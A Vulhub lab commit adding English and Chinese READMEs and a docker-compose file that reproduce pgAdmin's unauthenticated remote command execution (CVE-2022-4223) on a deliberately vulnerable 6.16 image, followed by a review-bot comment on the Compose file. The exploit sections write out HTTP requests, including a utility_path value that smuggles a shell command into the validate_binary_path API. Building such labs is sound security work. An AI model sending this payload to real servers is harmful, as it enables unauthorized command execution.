first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
BIN
pgadmin/CVE-2022-4223/1.png
Normal file
Binary file not shown.
After: Size 75 KiB
BIN
pgadmin/CVE-2022-4223/2.png
Normal file
Binary file not shown.
After: Size 105 KiB
65
pgadmin/CVE-2022-4223/README.md
Normal file
@@ -0,0 +1,65 @@
# pgAdmin <= 6.16 Unauthenticated Remote Command Execution (CVE-2022-4223)
[中文版本(Chinese version)](README.zh-cn.md)
pgAdmin is a popular and feature rich Open Source administration and development platform for PostgreSQL, the most advanced Open Source database in the world.
The pgAdmin server includes an HTTP API that is intended to be used to validate the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. The utility is executed by the server to determine what PostgreSQL version it is from. Versions of pgAdmin prior to 6.17 failed to properly secure this API, which could allow an unauthenticated user to execute arbitrary commands on the server.
References:
- <https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604>
- <https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595>
- <https://github.com/advisories/GHSA-3v6v-2x6p-32mc>
## Vulnerable Environment
Execute following command to start a pgAdmin 6.16 server:
```
docker compose up -d
```
After the server is started, browse the `http://your-ip:5050` to see the default login page of pgAdmin.
## Exploit
Before exploiting the vulnerability, send the following request to obtain the CSRF token:
```
GET /login HTTP/1.1
Host: your-ip:5050
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Connection: close
```
Get the session id and csrf token from response:

Then, fill the following request with the session id and csrf token and send it:
```
POST /misc/validate_binary_path HTTP/1.1
Host: your-ip:5050
Content-Length: 27
X-pgA-CSRFToken: [csrf-token]
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: pga4_session=[session-id]
Connection: close
{"utility_path":"a\";id;#"}
```
As you can see, `id` command has been executed successful:

63
pgadmin/CVE-2022-4223/README.zh-cn.md
Normal file
@@ -0,0 +1,63 @@
# pgAdmin <= 6.16 无授权远程命令执行漏洞(CVE-2022-4223)
pgAdmin是一个著名的PostgreSQL数据库管理平台。
pgAdmin包含一个HTTP API可以用来让用户选择并验证额外的PostgreSQL套件,比如pg_dump和pg_restore。但在其6.16版本及以前,对于用户传入的路径没有做合适的验证,导致未授权的用户可以在目标服务器上执行任意命令。
参考链接:
- <https://github.com/pgadmin-org/pgadmin4/commit/799b6d8f7c10e920c9e67c2c18d381d6320ca604>
- <https://github.com/pgadmin-org/pgadmin4/commit/461849c2763e680ed2296bb8a753ca7aef546595>
- <https://github.com/advisories/GHSA-3v6v-2x6p-32mc>
## 漏洞环境
执行如下命令启动一个pgAdmin 6.16服务器:
```
docker compose up -d
```
服务器启动后,访问`http://your-ip:5050`即可查看到pgAdmin默认的登录页面。
## 漏洞复现
在复现漏洞前,需要发送如下数据包获取CSRF token:
```
GET /login HTTP/1.1
Host: your-ip:5050
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Connection: close
```
在返回包中拿到一个新的session id和csrf token:

然后,将获取到的session id和csrf token填写进下面的数据包并发送:
```
POST /misc/validate_binary_path HTTP/1.1
Host: your-ip:5050
Content-Length: 27
X-pgA-CSRFToken: [csrf-token]
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: pga4_session=[session-id]
Connection: close
{"utility_path":"a\";id;#"}
```
可见,`id`命令已经被成功执行:

6
pgadmin/CVE-2022-4223/docker-compose.yml
Normal file
@@ -0,0 +1,6 @@
version: '2'
services:
web:
image: vulhub/pgadmin:6.16
ports:
- "5050:5050"
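Review bot: `version: '2'` is the legacy Compose file version key; `docker compose` (the v2 CLI that the README's `docker compose up -d` invokes) ignores it and prints an obsolete-attribute warning, so the line can be dropped. Because this image is intentionally exploitable without authentication, consider publishing the port as `"127.0.0.1:5050:5050"` unless the lab is meant to be reached from other hosts; the current `"5050:5050"` binds on every interface. Pinning `vulhub/pgadmin:6.16` is right, since the README's claim of a 6.16 environment rests on that tag.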